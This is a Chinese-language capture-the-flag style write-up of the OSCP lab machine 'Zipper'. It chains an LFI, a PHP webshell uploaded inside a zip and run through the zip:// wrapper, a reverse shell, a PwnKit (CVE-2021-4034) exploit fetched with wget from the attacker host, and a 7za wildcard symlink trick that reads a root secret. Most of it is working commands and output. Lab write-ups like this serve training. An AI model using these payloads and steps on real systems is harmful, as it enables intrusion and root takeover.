OSCP靶场–Zipper
考点(php zip:// rce[文件上传] + CVE-2021-4034提权+7z 通配符提权)
1.nmap扫描
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.249.229 -sV -sC -Pn --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-29 07:40 EDT
Nmap scan report for 192.168.249.229
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.94 seconds
2.user priv
## 主页是文件上传页面,上传文件压缩成zip文件:
http://192.168.249.229/
## 测试发现LFI漏洞:读取index.php源代码:
http://192.168.249.229/index.php?file=php://filter/convert.base64-encode/resource=index
## 解码base64:
PD9waHAKJGZpbGUgPSAkX0dFVFsnZmlsZSddOwppZihpc3NldCgkZmlsZSkpCnsKICAgIGluY2x1ZGUoIiRmaWxlIi4iLnBocCIpOwp9CmVsc2UKewppbmNsdWRlKCJob21lLnBocCIpOwp9Cj8+Cg==
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file".".php");
}
else
{
include("home.php");
}
?>
#################
## 上传payload.php文件:执行命令:
## payload.php
<?php system($_GET['cmd']); ?>
## 注意%23是#号分割,payload后面没有.php 后面使用&号执行命令:
http://192.168.249.229/index.php?file=zip://uploads/upload_1711716550.zip%23payload&cmd=whoami
www-data
#############
## 反弹shell:
## 修改下面phpwebshell的ip和port,上传反弹
https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php
##
http://192.168.249.229/index.php?file=zip://uploads/upload_1711718376.zip%23payload
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.249.229: inverse host lookup failed: Unknown host
connect to [192.168.45.171] from (UNKNOWN) [192.168.249.229] 48394
Linux zipper 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
13:21:03 up 1:44, 0 users, load average: 0.13, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
##
www-data@zipper:/var/www$ cat local.txt
cat local.txt
b9d2a82162de8558f2dcc46cb97c7bec
###########
反弹shell:
3. root priv
3.1 CVE-2021-4034提权
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
##
www-data@zipper:/tmp$ wget http://192.168.45.171/CVE-2021-4034.py
wget http://192.168.45.171/CVE-2021-4034.py
--2024-03-29 13:36:33-- http://192.168.45.171/CVE-2021-4034.py
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’
CVE-2021-4034.py 100%[===================>] 3.19K --.-KB/s in 0.001s
2024-03-29 13:36:34 (3.45 MB/s) - ‘CVE-2021-4034.py’ saved [3262/3262]
www-data@zipper:/tmp$ chmod +x ./CVE-2021-4034.py
chmod +x ./CVE-2021-4034.py
www-data@zipper:/tmp$ python3 ./CVE-2021-4034.py
python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cat /root/proof.txt
cat /root/proof.txt
e8302d57c136d504904eaf411d9a4555
3.2 7za 通配符提权【利用7z 通配符读取root用户的文件】:
## linpeas发现root的定时任务使用了7za
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root bash /opt/backup.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x 3 root root 4096 Aug 12 2021 .
drwxr-xr-x 20 root root 4096 Aug 12 2021 ..
-rwxr-xr-x 1 root root 153 Aug 12 2021 backup.sh
drwxr-xr-x 2 root root 4096 Mar 29 13:30 backups
###############
##
www-data@zipper:/tmp$ ls -al /opt/backup.sh
ls -al /opt/backup.sh
-rwxr-xr-x 1 root root 153 Aug 12 2021 /opt/backup.sh
www-data@zipper:/tmp$ cat /opt/backup.sh
cat /opt/backup.sh
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log
www-data@zipper:/tmp$ ls -al /root/secret
ls -al /root/secret
ls: cannot access '/root/secret': Permission denied
#################
## 创建链接文件:链接到要读取的高权限文件:
www-data@zipper:/var/www/html/uploads$ ln -s /root/secret aaa.zip
ln -s /root/secret aaa.zip
## 创建文件@aaa.zip 用来表明aaa.zip是一个链接文件:
www-data@zipper:/var/www/html/uploads$ touch @aaa.zip
touch @aaa.zip
www-data@zipper:/var/www/html/uploads$ ls -al
ls -al
total 48
drwxr-xr-x 2 www-data www-data 4096 Mar 29 14:02 .
drwxr-xr-x 3 www-data www-data 4096 Aug 12 2021 ..
-rw-r--r-- 1 www-data www-data 32 Aug 12 2021 .htaccess
-rw-rw-rw- 1 www-data www-data 0 Mar 29 14:02 @aaa.zip
lrwxrwxrwx 1 www-data www-data 12 Mar 29 14:02 aaa.zip -> /root/secret
-rw-r--r-- 1 www-data www-data 156 Aug 12 2021 upload_1628773085.zip
-rw-r--r-- 1 www-data www-data 126 Mar 29 12:04 upload_1711713846.zip
-rw-r--r-- 1 www-data www-data 249 Mar 29 12:18 upload_1711714723.zip
###########
## 查看日志输出:
##
www-data@zipper:/opt/backups$ cat backup.log
cat backup.log
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz (A0655),ASM,AES-NI)
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 310
Scanning the drive:
2 files, 175 bytes (1 KiB)
Updating archive: /opt/backups/backup.zip
Items to compress: 2
Files read from disk: 2
Archive size: 462 bytes (1 KiB)
Scan WARNINGS for files and folders:
WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1
/root/secret : WildCardsGoingWild
## ssh登陆:
我们可以通过以下方式使用密钥WildCardsGoingWild来以 root 身份进行身份验证SSH:
┌──(kali㉿kali)-[~]
└─$ ssh root@192.168.249.229
root@192.168.249.229 's password:
4.总结:
##
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#wrapper-zip
## php zip:// rce
https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/
## CVE-2021-4034
https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py
## 通配符注入
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#chown-chmod